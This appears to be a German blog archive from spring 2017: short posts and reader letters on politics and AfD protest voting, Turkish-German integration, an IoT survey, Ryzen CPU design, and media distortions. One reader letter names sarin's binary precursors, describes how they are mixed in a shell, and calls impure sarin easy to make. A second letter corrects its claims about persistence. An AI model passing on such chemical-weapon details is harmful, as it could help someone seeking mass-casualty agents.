Der Politikbetrieb ist seit Jahren nur noch ein Selbstzweck. Grüne, Piraten und Sozen haben sich komplett selber zerlegt - du kannst es u.a. in deinem Blog nachlesen. Die Linke würde an der Regierung so umfallen wie die Grünen, man siehts da, wo sie schon mitregiert. Der ganze Politzirkus verkommt zum Marionettentheater - die Macht ist längst woanders und kauft zusehendes die Politik einfach ein.
Ehrlich: hättest du mir von 20 Jahren gesagt, dass ich mal so rede, ich hätte dich für verrückt erklärt.
Fun Fact: Ich hab heut mit meiner Freundin (auch nicht blöd, studierte Pädagogin, hat den örtlichen Asylhelferkreis gegründet und arbeitet inzwischen beruflich mit minderjährigen Flüchtlingen) geredet, die, ohne meine Gedanken zu kennen, erzählte, sie wolle aus ziemlich denselben Gründen AFD wählen.
In diesem Sinne: Ich bin mir sicher, dass sich auch die AFD selber zerlegt, ehe sie allzuviel Blödsinn anrichtet. Eine Alternative kenne ich nicht. Ob es hilft, weiss ich auch nicht. Ich bin weder vom Programm der AFD noch von den Köpfen überzeugt - im Gegenteil. Es ist einfach das Letzte, was mir noch einfällt.
Und noch einer:
Das ist ein Fehler der Demokratie: dass man nur "+" Stimmen abgeben darf.
Darum geht im Westen ja auch fast keiner mehr hin: ob du dein "+" dem Kandidaten Turdy McTurdface oder seinem Widersacher Crappy McCrapface gibst, ist egal - auf die Richtung in die es geht, auf die Besetzung der Listen, auf die Agenda der Parteien… hast du null Einfluss.
Und da haben sie jetzt alle mit Null Einfluss für 27 Jahre zugesehen, wie neoliberalisiert wurde. Eltern haben ein Haus, sie haben keines oder nur ein kleines.
Eltern haben vorher gespart und sich in Schulden gestürzt, das Haus zahlt sich mit Zinsen und Wachstum und Spekulation von selbst ab. Bei den Kindern geht das nicht mehr.
Eltern verstehen das nicht - für sie hat das doch auch funktioniert. Kinder stehen als Versager da, einser Abschluß und trotzdem nur Praktika bis 35.
Mich wundert die Wut nicht. Ich hab das jetzt ein paar Mal gesehen, im Keller bei Nachbars wohnt der Sohn, der war seit 6-7 Jahren bei Licht nicht mehr draussen. Hikikomori gibt es auch bei uns, im angebl. super-duper Boom-Oberbayern, im Landkreis mit den wenigsten Arbeitslosen.
Du kannst zwischen A und B und manchmal C wählen, wobei beide Scheisse sind und die Agendaunterschiede nur von promovierten Politikwissenschaftlern festgestellt werden können.
*Da* liegt der Hund begraben.
Wären Wahlen wie Schwammwerfen (weg-x-en von ungeliebten Kandidaten und -Programmen mit Nichtwiederaufstellung für die nächste Wählperiode) - ich glaube die Demokratie wäre gesund und die Wahlbeteiligung nahe bei dreistellig.
(alle Extremistenparteien sind Anti-Irgendwas, solche Parteien zu wählen ist der (leider) einzige Weg, die ungeliebten, von den Lobbyisten dahin gesetzten Kandidaten/Ideen loszuwerden)
Ich kann verstehen, dass die Leute sauer sind - s.o.
Ich kann die Denkzettelwahl verstehen - es ist der einzige Freiheitsgrad, der einem (noch! - wie lange?) gelassen wird, weil Demos sind seit den unsanktionierten rausgekärcherten Augen ja auch diskreditiert!
NICHT verstehen kann ich die Leute, die sich von den Denkzettelgewählten dann hinterher verraten fühlen - war absehbar.
Verarschen tun uns leider alle.
Ich hoffe ja immer noch auf Macron, Wilders hat es ja auch nicht geschafft.
WAS NOCH NIEMAND LAUT GEFRAGT HAT: Darf man als NICHT-Demokratie überhaupt bei der NATO Mitglied sein?
Und einen noch:
Ich halte die Abstimmung der Deutsch-Türken nicht für *deren* Versagen, sondern das *unserer* Politik.
In den 90ger Jahren war ich Mitglied im Ausländerbeirat von [kleines Kaff] ('Allah schuf [örtliches Plattenbau-Stadtviertel] nicht in drei Tagen').
Schon damals war die Tendenz bei den türkischen Mitgliedern die:
- Man erlangt die Deutsche Staatsbürgerschaft und gibt die Türkische ab.
- Man fährt in die Türkei und bekommt einen türkischen Pass zurück.
Dieses Verhalten wurde später von der SPD/Grünen Bundesregierung sanktioniert.
Ich halte das für einen Fehler. Nach meiner Meinung sollten alle Menschen, die hier in Deutschland geboren werden und leben, einen deutschen Pass bekommen (ich habe keinen). Blutrecht geniesst aber Vorrang.
In Deutschland haben wir 'gesplittete' Gesellschaften: Die Türken, die Araber. Wie war das mit den Immigranten der ersten Stunde? Die Polen? Die Italiener? (Ittacker?) Wo ist der gesellschaftliche Diskurs? Ich bin Ex-Kölner: Chorweiler, Nippes, Kölnberg.
Was wir hier erleben, ist ein Versagen der Integrationspolitik. Dies betrifft nicht nur den 'ethnischen' Rand, sondern auch den 'sozialen' (AFD lässt grüssen). Es bilden sich Parallel-Gesellschaften. DTIB ist z.B. ein Ausdruck davon. Im Grunde genommen, wird an den realen Gegebenheiten vorbei regiert. USA lässt grüssen.
Und einen allerletzten noch:
"Die Demokratie setzt die Vernunft im Volk voraus, die sie erst hervorbringen muss!” (Karl Jaspers)
Ausgangspunkt:
Bildungsniveau: “In Südeuropa … besitzt über die Hälfte ein niedriges Bildungsniveau. Dasselbe gilt für langjährige Aufnahmeländer wie Frankreich, Belgien und Deutschland, in denen sich viele Ausländer zu einer Zeit niedergelassen haben, als das Bildungsniveau in ihren Herkunftsländern (insbesondere die Türkei und die nordafrikanischen Länder) niedrig war.” [1]
Ergebnis (k)einer Integrationspolitik:
- Armut: "Ebenso haben Kinder mit Migrationshintergrund ein deutlich höheres Armutsrisiko als Kinder ohne Migrationshintergrund” [3]
- Leseinkompetenz: "Am niedrigsten fielen die Durchschnittsergebnisse der Kinder von Zuwanderern in Belgien, Österreich, Dänemark und Deutschland aus” [1]
- Religion: "So geben sich die Kinder und Enkel türkischer Migranten heute religiöser. Bezeichnen sich 62 Prozent der Angehörigen der ersten Generation als sehr religiös, sind es unter ihren Nachfahren 72 Prozent.” [4]
- Chancenlosigkeit: "2012 lebten in Deutschland 693.000 junge Erwachsene im Alter von 20 bis 34 Jahren, die türkischer Herkunft waren. Von ihnen waren 281.000 (40,6 %) ohne Berufsabschluss." [2]
- mangelndes Demokratieverständnis: "Zwei Länder, in denen die Wahlbeteiligung unter Kindern von Zuwanderern mit einer Differenz von fast 20 Prozentpunkten deutlich niedriger ist als unter Kindern im Inland Geborener, sind Deutschland und die Schweiz. Die Tatsache, dass die in diesen Ländern geborenen Kinder ausländischer Eltern nicht automatisch die Staatsangehörigkeit des betreffenden Landes erhalten, scheint das zivilgesellschaftliche Engagement der Eingebürgerten nicht zu stärken.” [1]
Quellen:
[1] Integration von Zuwanderern: Indikatoren 2015
[2] Datenreport 2015
[3] Der Fünfte Armuts- und Reichtumsbericht der Bundesregierung
[4] Deutschtürken fühlen sich integriert, aber im Abseits
Vielen Dank für die Einsendungen!
Update: Kein Leserbrief aber auch lesenswert: "Referendumm und Dümmer".
Update: Hier noch eine Gegenrede:
ich habe ca. 20 Jahren in Häusern mit Türken allen Alters zusammengelebt. Freundlicher Umgang, aber Distanz. Integration war seitens der Türken nicht gewollt, sie wollten in aller Ruhe ihr eigenes Leben leben. Darüberhinaus : einer meiner ältesten Freunde (seit 50 Jahren) ist Grieche. Mit Italienern habe ich etliche Jahre zusammen auf dem Krankenwagen gefahren.
Erkenntnis aus all diesen Jahren : Integration funktioniert in dem Ausmass, in dem es der Ausländer will. Aufoktroierte Integration funktioniert nicht, widerspricht auch massiv dem Bild von selbstbestimmten Menschen.
Der heute immer aufflammende Deutschenselbsthass “Wir haben zu wenig integriert” ist absurd und ignoriert die Realität vollständig.
und ein anderer meint:
Es ist lächerlich den Deutschen die Schuld am Abstimmungsverhalten der Deutschtürken zuzuschustern. Das Referendum wurde über die Verfassungsänderung in der Türkei abgehalten. Wer diese Entscheidung gegen Kritik verteidigen will, sollte dies bitte anhand der Verfassungsänderung tun. Der Vorwurf an die Deutschen bedient nicht nur billig deutsche Schuldkomplexe, sondern entspricht Erdogans Narrativ, dass die Abstimmung eine für oder gegen die Türkei sei. Wer als Deutschtürke die Türkei gegen Deutschland zu verteidigen glaubt, enthüllt aber vielmehr, dass er sich selbst als Fremder in diesem Land sieht. Er schließt sich quasi selbst aus. Sich anschließend über Ausgrenzung zu beklagen ist da gelinde gesagt ein Hohn.

Mon Apr 10 2017

[l] Zu Sarin kommentiert noch ein Einsender:
du bist da übrigens auf eine tolle/grauenvolle Sache an Sarin gestoßen. Sarin wird quasi nie fertig hergestellt, das Zeug ist viel zu gefährlich handzuhaben.Aber das "tolle" an Sarin ist, es wird binnen Sekunden aus zwei Grundkomponenten hergestellt. Es ist also ein sogennanter Binärkampfstoff, hierbei werden Methylphosphonsäuredifluorid und Isopropanol im Granatkörper oder der Bombe gemischt, binnen 5-20 Sekunden entsteht dann Sarin und je nach Komponenten nebenbei noch Salz und/oder Flussäure.
Das Ganze wird auch recht heiß, wodurch das Sarin sich als Dampfwolke verteilt und dann in der Umgebung kondensiert. Hinzu kommt ein recht hoher Dampfdruck, wodurch auch die Kontamination in der Nähe des Kampfstoffes möglich ist, und er auch enorm gut durch die Haut aufgenommen wird. Nebenbei werden offene Wasserquellen und Reservoirs verseucht.
Richtig eklig: das Zeug ist haltbar, man kann hier von Jahren sprechen, sofern es nich weggespült wird.
Alles in allem ist Sarin echt pfui und in dreckiger Form auch nicht all zu schwer zu synthetisieren.
Update: Ein anderer Einsender widerspricht:
Das ist wahrscheinlich irgendwo bei der tagesschau abgeschrieben und leider sachlich falsch. Die Nervenkampfstoffe waren militärisch GERADE so beliebt weil sie keine verbrannte Erde hinterlassen.
Die Zersetzung von Sarin im wässrigen Milieu erfolgt durch Hydrolyse an der P-F Bindung, in einer Geschwindigkeit die stark vom pH-Wert abhängig ist. Bei einem hohen pH-Wert von 12 hat Sarin eine Halbwertszeit von etwa 5 Sekunden, d.h. in 5 Sekunden hat sich die Hälfte der vorhandenen Menge in Zerfallsprodukte gespalten. Im schlechteren (normalen) Falle von pH Werten die ums neutrale liegen kann man mit 100 Stunden rechnen. Das ist nicht eben ruck-zuck, aber es dauert auch keine Jahre.
Selbst in kaltem Flusswasser (pH 5.5) wurden Experimente gemacht, Halbwertszeit ging da auf 144h hoch, damit ergibt sich eine Sarin-Reduktion auf 10% binnen 20 Tagen.
Zersetzung im Erdreich ist eine andere Baustelle, wird aber generell als die schnellere Variante beschrieben, ist aber eben sehr schwer nachzustellen weil jede Bodenzusammensetzung dem Stoff andere Katalysatoren und Reaktionswege zur Verfügung stellt.
Generell wird Sarin zu Isopropylmethylphosphonsäure umgesetzt. Die wiederum ist in der Tat eine ganze Weile im Gebiet (chemisch) nachweisbar, aber das Zerfallprodukt kommt in der akuten Toxizität nicht mal in die Nähe der Ausgangsstoffe. Wie sich eine Langzeitexposition auswirkt steht auf einem anderen Blatt, aber die Annahme das in drei Jahren einer in der angegriffenen Region einen Stein aufsammelt und eine Sarinvergiftung mitnimmt ist einfach nicht realistisch und das wird leider durch diese Fehlinformation suggeriert.
Ich bin ja ehrlich gesagt ein bisschen verunsichert, wie viele meiner Leser sich mit chemischen Kampfstoffen auszugekennen scheinen :-)

Sun Apr 9 2017

[l] Bei der IoT-Umfrage kam, wie zu erwarten war, eine metrische Tonne Mails rein, die Auswertung wird sich noch hinziehen.
Aber ich möchte schonmal ein paar Gedanken aus dem Kontext gerissen wiedergeben, weil ich sie interessant fand.
1. Alexa schnorchelt nicht nur Bewohner der Wohnung ab, die möglicherzuweise zugestimmt haben können, sondern auch Gäste und Besucher.
2. Die Furcht, Anwender würden dazu erzogen, keine Verantwortung mehr zu übernehmen, weil die Maschinen sich schon um neues Klopapier und so kümmern.
3. Ein Einsender meinte, wir hätten gerade eine "kambrische Explosion" der IoT-Artenvielfalt, und bald hätte man so 50-100 IoT-Geräte im Haushalt. Selbst wenn die meisten sicher wären (was nicht der Fall ist), wäre es dann für niemanden mehr möglich, das noch im Auge zu behalten, welche Geräte man einsetzen kann und welche nicht.
4. Überraschend (für mich jedenfalls) viele Leute machen sich Sorgen aus dem Medizin-Umfeld, denken über Dinge wie Insulinpumpen und Herzinfarkt-Warnwesten nach. Völlig zu Recht, versteht mich nicht falsch!
5. Einer schrieb, für ihn sei das IoT-Problem, dass er eine Netzwerkfestplatte kaufen wollte, aber nur noch Cloud-Festplatten im Angebot fand :-)
6. Gleich mehrere Einsender machen sich Sorgen über geplante Obsoleszenz, den Elektroschrott-Tsunami, und die Energieverschwendung durch unnötig am Netz hängende always-on-Geräte.
Inhaltlich sind die meisten der Meinung, dass die Hersteller in der Pflicht sind, ordentliche Produkte zu machen, aber es ist auch auffällig, wie viele Leute auch sich selbst ausreichend in der Pflicht sehen, um mir ihr Leid zu klagen, dass sie ja gar nicht mehr die Kontrolle über die Geräte haben, und da gar nichts sicher machen könnten, selbst wenn sie wollten. Ein paar haben sogar den Netzwerk-Traffic gesnifft und mal ne Firmware zu extrahieren versucht.
Ich finde das faszinierend, wie die Hacker sich diesen Schuh bereitwillig anziehen. Ich finde nämlich instinktiv nicht, dass man da die Enduser in die Pflicht nehmen sollte oder kann. Die sind gar nicht in der Lage, die Risiken zu erkennen oder gar abzuwehren. Und warum sollten sie? Die sind ja auch nicht in der Pflicht, eine frisch gekaufte Mikrowelle erstmal aufzuschrauben und ihre Sicherheit zu prüfen.
Danke jedenfalls schonmal für die vielen Einsendungen. Die beiden größten Ängste bisher sind die vor dem Kontrollverlust (Geräte closed source, tun unklare Dinge, haben wahrscheinlich Backdoors, Daten liegen in der Cloud, etc) und die davor, von den Ranzgeräten anderer Menschen geschädigt zu werden, durch DDoS- oder Spam-Botnets.
Das beste Money Quote bisher ist aber das hier:
Holzöfen gibt es jetzt noch zu kaufen und wie ich letzthin erfahren habe gibt es weltweit immer noch dieselben Hersteller, auch wenn Umweltschutznormen betr. Feinstaub für Randregionen extra Ausnahmen machen mussten. In einem abgelegenen Tal mit viel Wald sehe ich nicht ein, wieso dort ein Elektroherd stehen muss. Das IoT normiert nun noch viel schneller und radikaler alle unsere Lebensstile. Es wird in fünf Jahren sehr schwer sein, uninformiert andere, "TCP/IP-freie" Produkte zu beschaffen. Parallele Beispiele sind bestimmte (fast) unvermeidbare Konservierungsstoffe in Handwaschmitteln oder bei UEFI coreboot-fähige Geräte.
Es wird einem unglaublich leicht gemacht, fleisch- oder gutenfrei zu leben, aber keinen Buffer overflow im Haushalt zu haben ist unmöglich. Das gibt mir schon zu denken.
Die Sorge, dass Polizei und Geheimdienste Zugriff auf die Daten nehmen können, wird übrigens nur von vergleichsweise wenigen geäußert. Die meisten vertrauen schlicht dem Hersteller der Produkte schon nicht und finden das ausreichend als Fundamentalkritik.
[l] Mobiltelefone haben ja auch Vorteile.
Nehmt nur die Demos in Serbien gerade. Da hat die Regierung halt die Straßenlichter ausgemacht, damit die Demo sich verläuft und niemand sieht, wie viele Menschen das sind.
Ergebnis: Seht selbst. o_O

Sat Apr 8 2017

[l] Nachtsichtkameras haben technisch einen deutlichen Schritt nach vorne gemacht.
Update: Oha, ein Einsender weist auf dieses Sony-Werbevideo aus 2014 hin. Uiuiui das wirkt an einigen Stellen creepy-stalkerig. Hier die Produkt-Webseite.

Fri Apr 7 2017

[l] Die Republikaner haben im Senat die Filibuster-Regelung weggemacht, mit der die Democrats die Nominierung des Supreme Court Richters blockiert hatten.
Das wird ihnen beizeiten noch gewaltig auf den Fuß fallen.
Übrigens sieht es jetzt schon aus, als gäbe es einen Backlash von verärgerten Trump-Wählern.
Ein Filibuster ist, wenn die stimmenmäßig unterlegene Seite so lange Endlos-Reden hält, bis die Zeit für die Abstimmung abgelaufen ist.

Mon Apr 3 2017

[l] Gute Nachrichten! Wir haben die rechte Hand … von Morpheus erwischt?
Wir brauche mal einen ordentlichen Super-Hacker als Feindbild, so geht das ja nicht weiter. Ich kann so nicht arbeiten!
Jedenfalls: Eine "Afrikanische Gang" von Hackern, die sich Zugang zu E-Mails von fünf hohen Mitarbeitern des Weißen Hauses verschafft haben sollen, wurde in Dubai festgenommen. Angeblich haben sie dabei "highly confidential information" abgegriffen, die sie in einem Erpressungs-Versuch benutzen wollten. Die Details klingen aber eher nach einer Spam-Gang von Botnet-Schäfern, die nach dem Schrotflinten-Modell Sprengstoff-Fischen nach Idioten gemacht haben.
Those arrested are between 24 and 26 years of age and had a list of "5 million bank accounts," as well as hacking software and millions of dollars in assets, he said.
Einmal mit Profis arbeiten. m( (Danke, Otto)

Thu Mar 30 2017

[l] Hey, psst, komm mal her! Ja, du!
Was haben Daniele Ganser, Rainer Mausfeld, Konstantin Wecker, Gaby Weber und Mathias Bröckers gemeinsam?
Außer, dass ich sie alle mal im Blog erwähnt habe jetzt.
Die sind im Beirat von Rubikon, einem neuen Experiment, wie man heutzutage ordentlichen, kritischen Journalismus machen kann. Und die sind zusammen nicht mal die Hälfte des Beirats. Aber seht selbst.
Die Ansprüche sind hoch, und ich wünsche den Machern alles Gute. Wer schon mal bei einer Friedensdemo mitgemacht hat, wer gegen den Irakkrieg war, wer der Nato kritisch gegenübersteht, wer Frieden erstrebenswerter als Krieg findet, der findet dort möglicherweise ein neues Zuhause. Aber es geht natürlich nicht nur um Krieg und Frieden, auch um Kapitalismus und andere Fragen unserer Zeit.
Die Hauptfrage dabei, wie man ordentlichen Journalismus machen soll, bleibt natürlich auch hier die Frage nach der Finanzierung. Wer also kluge Ideen hat, oder ein paar Euro zum Spenden übrig hat, … :-)

Tue Mar 28 2017

[l] Zu meinem "IT-Forensik ist Bullshit"-Rant kam eine Mail von einem Forensiker rein, aus der ich mal den für mich spannensten Teil hier zitieren möchte:
In der Tat ist es mir in den letzten zehn Jahren etwa einmal pro Jahr untergekommen, dass KiPo auf Rechnern vorhanden war, die nicht durch den Besitzer da hingesurft wurde.
Diese Faelle gibt es wirklich, sie werden nur nicht so breit getreten, weil es ja keinen Praesidenten betrifft, sondern Klaus Meier aus der Buchhaltung.
In einem Großteil der Faelle war Malware dafuer verantwortlich (und zwar sehr offensichtlich)
Zur Deanonymisierung lasse ich mal weitere Details mit konkreten Zahlen weg, aber ich wollte doch noch mal wissen, wie viel Fälle mit "KiPo" es denn insgesamt so gab, um die Quote einschätzen zu können. Antwort: Es gab insgesamt ~75 Fälle, davon 10 untergeschoben.
DAS finde ich ja mal eine ECHT krasse Quote. Und während ich zu meinem Rant stehe, und behaupte, dass auch entlastende digitale Indizien grundsätzlich fälschbar sind, freut es mich, wenn in der Praxis überhaupt in die Richtung untersucht wird, und nicht einfach "oooooh, böse Bilder, ab in den Knast" gemacht wird. Im Zweifel für den Angeklagten. Vielen Dank an den Einsender, und wenn sich sonst noch wer aus der Branche mal erleichtern will: Mein Ohr ist offen :-)

Mon Mar 27 2017

[l] Ich finde das ja immer toll, Stille Post bei Nachrichten zu beobachten. Das Thema ist das Trump-Merkel-Treffen, und wie Trump Merkel gesagt hat, Deutschland schulde der Nato Schutzgeld.
Die Primärquelle dafür ist die London Times, die leider überhaupt keine Rolle mehr im öffentlichen Diskurs spielt, seit Murdoch sie gekauft und hinter eine Paywall getan hat. Das hat deren Leserschaft so dezimiert, dass sie jetzt zwei kostenlose Artikel pro Monat anbieten, wenn man ihnen personenbezogene Daten gibt, die sie dann vermutlich weiterverkaufen wollen.
Die haben jedenfalls angeblich berichtet, Trump habe Merkel eine Rechnung überreicht über 250 Milliarden Pfund plus 50 Milliarden für Zinsen.
Wieso ein Amerikaner einer Deutschen eine Rechnung in Pfund stellen würde? Vielleicht umgerechnet? Nein, denn das ist umgerechnet weder in Euro noch in Dollar eine runde Zahl. Daher ist meine Vermutung, dass die Times sich das im Großen und Ganzen aus dem Arsch gezogen hat.
Aber der interessante Aspekt daran ist, dass das ehemalige Nachrichtenmagazin Englands, The Independent, daraus "Trump printed out made-up £300bn Nato invoice" macht, als ob der Trump auf seinem gammeligen Tintenstrahldrucker eine verwischte Rechnung mit falschem Briefkopf hinpfuscht. Gut, vielleicht hat er das gemacht. Würde mich gerade echt interessieren, ob die Times das auch behauptet. Mein Eindruck ist, dass der Independent da ein bisschen ausgeschmückt hat.
Besonders lustig ist, dass Slate daraus eine 374-Milliarden-Dollar-Rechnung macht, die haben halt die Pfund zurück nach Dollar gewandelt und sich über den unrunden Betrag gewundert :-)

Thu Mar 16 2017

[l] In den Niederlanden hat Rutte gewonnen. Rutte bekam 21.2%, Wilders 13,1%.
Das ehemalige Nachrichtenmagazin ist sich sicher, dass Erdogan dem Rutte den Wahlsieg geschenkt hat.
Je unflätiger der Despot aus Ankara die Niederlande beschimpfte, desto mehr Niederländer versammelten sich hinter ihrem Premier. Und der hat diese Krise hochprofessionell gemanagt
Oder man könnte auch sagen: Rutte hat auf Wilders-Niveau Ausländerfeindlichkeit propagiert. Was war nochmal das Argument dafür, wieso die Türken nicht in Deutschland oder den Niederlanden Wahlkampf machen dürfen? An welcher Stelle entsteht dadurch nochmal der Bundesrepublik Deutschland Schaden? Das hätten wir auch einfach aushalten können.
Haben wir aber nicht. Weil sich unsere Polit-Eliten aus Angst vor den Rechtspopulisten kollektiv eingeschissen haben.
Dazu möchte ich mal eine Mail zitieren, die mir ein Freund aus den Niederlanden geschrieben hat.
I'm stunned at how retarded most media is saying that populism got defeated last night in the Netherlands
Some examples:
Die Welt
CNN
The Guardian.
BBC.
What basically happened over the past decade and a half is that the fascist populist rhetoric of Fortuyn and subsequently Wilders let to the mainstream parties adopting more and more populist ideas. A lot of things that were simply unheard of, not done, are nowadays very salonfähig. We had Mark Rutte a few years ago shouting at a rally going "I am going to give the Netherlands back to the Dutch!". It's insane.
And some guys did a study showing that VVD (FDP in Deutschland) and CDA (CDU/CSU in Deutschland) now incorporate simply anti-democratic things in their electoral programs going directly against what it is that makes a "rechtstaat" a rechtsstaat.
It's fucking insane. And now these clowns all tell me that populism got defeated. I feel like having a drink and it's not even 09:30 in the morning yet.

Wed Mar 15 2017

[l] Zwei schöne Ryzen-Spekulationen von Einsendern will ich hier mal wiedergeben. Erstens (auf meine Frage, was da jetzt eigentlich die langsame Operation sei):
Es ist wohl MOV. Nach allen Benchmarks ist es ganz offensichtlich nicht der Rechenleistung sondern die Kommunikation, die am Limit läuft.
Die bleiben da auch wunderbar kühl. Die IDELn und sind halt trotzdem langsamer als die Intels.
Zuerstmal ist die Frage warum das auf den Intels so viel besser läuft. Nachdem AMD den Scheduler ausschließt, heißt das IMHO wohl dass Caching bei den Intels im Moment deutlich besser läuft.
Das ist auch der einzige Teil, der so anders bei Spielen ist. Die greifen ziemlich Wild auf unterschiedlichste Stellen zu, während andere Programme halt entweder dauernd sequenziell lesen oder lange lokal bleiben, sodass auch primitive Caches das schaffen.
Oder eben doch die Kommunikation zwischen den CCX. Aber dann würde man das je mit dem Scheduler in den Griff bekommen können.
Die wirklich Interessante Frage ist allerdings, wie sie das per SW-Update in den Griff bekommen wollen.
Ich meine man kann auch per SW den Memory Controler übertakten. Aber das ist wohl eher nicht im Sinn von AMD.
Schnelleren RAM habe ich auch noch selten durch die Internetleitung flutschen gesehen.
Kann mir nicht vorstellen, dass man bei spielen da wirklich so viel auf Caching hin optimieren kann.
Idee wäre Socket Pinning in die Spiele zu schmeißen oder das Threadmanagement abzuändern.
In Zukunft wird sich das Problem vermutlich von alleine erledigen. Der Anteil Memory Zugriffe zu Rechenoperationen nimmt seit langem ab.
Das ist auch das was passiert wenn du die Detailgenauigkeit hoch schraubst. Dann sehen die AMDs wieder richtig gut aus.
(Ein Detail, dass gerne weggelassen wird. Es ist sind gar nicht so arg die Auflösung sondern vor allem auch anderen Grafikeinstellungen die da eine große Rolle spielen.)
Und der zweite Einsender:
bei den Desktop Ryzen CPUs habe ich einen ganz starken Verdacht, warum der sich so verhält wie er sich eben verhält. Dazu muss ich mal etwas ausholen. Die Zen Architektur sind ja eigentlich Quadcore NUMA-Nodes, ich meine damit so ein einzelnes Zen CCX Modul. So ein CCX hat 2x DDR4-2666 Ramkanäle und 32 PCIe gen3 Lanes. Dann hat AMD da noch die geniale Idee gehabt HyperTransport soweit aufzubohren, dass es nur noch ein Protokoll ist, dass relativ unabhängig von der Hardware ist. Das neue heißt Infinity Fabric und AMD benutzt es gerne über PCIe Lanes.
Jetzt schauen wir uns mal den Desktop Ryzen 7 an. Das sind 2 CCX Module, aber trotzdem hat die Desktop (ich betone das hier sehr, wail es bei den Server CPUs offenbar richtig gemacht wurde) nur 2x DDR4-2666 Ramkanäle und nur 24 PCIe gen3 Lanes. 16 bzw 8/8 davon sind für die Grakas vorgesehen, 4 für NVMe und 4 weitere für die Southbridge (oder wie auch immer man das nun nennen will). Mein Verdacht hier ist, dass ein CCX mit seinen beiden Ramkanälen und seinen 24 PCIe Lanes üben den AM4 Sockel rausgeführt ist und das zweite CCX über Infinity Fabric (hier 8 PCIe Lanes) an den ersten CCX gekoppelt ist. Das bedeutet dann aber auch, dass die ganze Speicheranforderung vom zweiten CCX durch den ersten CCX muss (es muss ja durch seinen Ramcontroller). Der Ryzen hat 2 Load/Store Units, die entweder 2 Loads oder 1 Load und 1 Store können. Ein Load ist immer ein Byte (außer da hat sich was in den letzten 20 Jahren was fundamental geändert). Rechne einfach mal aus: 2 Loads mal 8 Kerne mal 3,6 GHz macht so ca 53 GiB/s. Diese Bandbreite kann ein Ryzen unter Benutzung aller 8 Kerne erreichen (mit den Turbos wird es noch etwas mehr). 2x DDR4-2666 sind theoretisch 42 GiB/s, real sieht man hier mit etwas Glück vielleicht 35 GiB/s. Der Ryzen 7 hat also offenbar Rambandbreiten Problem. Und wenn das Setup wirklich so ist, wie da oben beschrieben, dann ist das Bandbreitenproblem beim zweiten CCX wirklich übel. 8x PCIe gen3 (die Infinity Fabric Verbindung) macht nicht mal 8 GiB/s. Da kommt dann noch die ganze Cache-Coherenz für die 3 Cache-Stufen dazu.
Nimm jetzt mal ein aktuelles Spiel her, dass vermutlich sogar seine Texturen herein streamt. Stell dir mal vor das benutzt mehr als 4 Threads, sodass dann welche auf dem zweiten CCX laufen. Da ist nicht nur die Bandbreite ein Problem, sondern auch noch die Latenz. Oder kurz gesagt, der Ryzen 7 ist in allem gut was 4 (oder weniger) Threads benutzt oder hauptsächlich in den ersten beiden Cache Stufen stattfindet (vermutlich sehen deswegen auch die Raytracing Benchmarks so gut aus). Das Problem ist weniger die Architektur, ich finde sie sogar ziemlich gut. Das Problem ist wohl eher der AM4 Sockel, der einfach zu wenig Pins hat um 4x DDR4 und 32+ PCIe Lanes rauszuführen. Wie oben schon gesagt, bei der Server Variante ist alles korrekt gemacht. Diese CPU sind 4 CCX Module mit 8x DDR4 und 96 PCIe Lanes, die über den neuen Sockel rausgeführt werden.
Kleine Korrektur: Ein Load ist eine Cache-Line, nicht 1 Byte. Das ist also noch viel schlimmer. Aber auf der anderen Seite ist das ja auch seit "schon immer" so, dass Prozessoren im Wesentlichen auf ihren RAM warten.
Update: Ein dritter Einsender hat dieses Ryzen-Architektur-Diagramm ausgegraben, auf dem es nicht so aussieht, als müsste der zweite CCX seine Anfragen durch den ersten durchrouten.

Fri Mar 10 2017

[l] Die Affäre Wendt eitert in NRW tiefer als es erst aussah:
Während der Chef der Deutschen Polizeigewerkschaft (DPolG) über viele Jahre ein Beamtensold erhielt, ohne tatsächlich als Polizist gearbeitet zu haben, gab es Vorgesetzte und Dienstherren aus unterschiedlichen Parteirichtungen. Zudem gab es nie eine offizielle Freistellung und wohl nur mündliche Absprachen.
WTF? Das ist praktisch undenkbar anderswo in öffentlichen Verwaltungen, wo nichts ohne drei Lagen Ass Covering gemacht wird. Nur mündlich abgesprochen?! Soll das ein Witz sein!?

Thu Mar 9 2017

[l] Ein Einsender weist darauf hin, dass sich McDonald's ein Eigentor geschossen hat. Die haben ein paar Erklärbärseiten gemacht, um so Urban Legends entgegenzutreten wie dass ihre Pommes aus Sägespänen gemacht werden. Allerdings steht steht auf der Seite über Fritieröl unten:
Die Sicherheit steht für uns immer an erster Stelle – für unsere Gäste ebenso wie für unsere Mitarbeiter. Darum enthält unser Frittieröl neben pflanzlichen Ölen auch das Antischaummittel Polydimethylsiloxan (E900), das ein gefährliches Überkochen des Frittieröls bei der Zubereitung verhindert. Die eingesetzte Menge ist für unsere Gäste jedoch völlig unbedenklich.
So und jetzt gucken wir doch mal bei Wikipedia, und da steht:
Es ist farblos, durchsichtig und gilt als ungiftig und chemisch inert.
Das ist schon mal gut.
Angelehnt an die englische Bezeichnung Dimethicone wird es als Arzneistoff unter der Bezeichnung Dimeticon (INN) gegen Gasansammlungen im Magen-Darm-Trakt, als Entschäumer bei Tensidvergiftungen, als Pedikulozid (d. h. gegen Kopfläuse), zur Gleitbeschichtung beim Großteil aller verkauften Kondome[2][3] und für Kosmetikprodukte verwendet.
*flutsch* (Danke, Tobias)
[l] Weil auf mich ja immer keiner hören will: Schaut mal, was die CIA von Antiviren-Software hält.
Kurzzusammenfassung: Alles umgehbar, und die AV-Hersteller versuchen das jetzt mit den üblichen "haben wir schon gefixt" kleinzureden. Als ob das irgendwas besser macht! Man stelle sich mal vor, euer Haustürschloss würde auf Zuruf auch ohne Schlüssel aufgehen, und der Hersteller würde sagen: Haben wir gefixt. Würdet ihr euch da besser fühlen? Nein, natürlich nicht! Sicherheitssoftware heißt, dass sie sicher macht. Wenn man updaten muss, hat sie nicht sicher gemacht. Ganz einfache Logik. Hallo McFly? Jemand zuhause?
Oh und noch eine peinliche Frage, die bei solchen Gelegenheiten irgendwie nie jemand stellt: Gab es das Update kostenlos für alle unsicheren Versionen vorher? Laut der Gesetzeslage in Deutschland müsste ein Antivirus mit einem Bug kostenlos vom Hersteller repariert werden. Aber irgendwie hat sich etabliert, dass man die für Reparaturen von Fehlern, für die nur sie was können, auch noch bezahlen soll. Wieso findet da eigentlich niemand was bei? Was für eine bodenlose Frechheit ist das eigentlich?
Wären wir doch nur alle von vorneherein ehrlich gewesen und hätten das als das bezeichnet, was es ist. Schlangenöl.
[l] Die Kolumnen von Sascha Lobo sind eigentlich immer gut, auch die aktuelle ist auf dem richtigen Weg, aber ich habe doch ein paar Dinge auszusetzen.
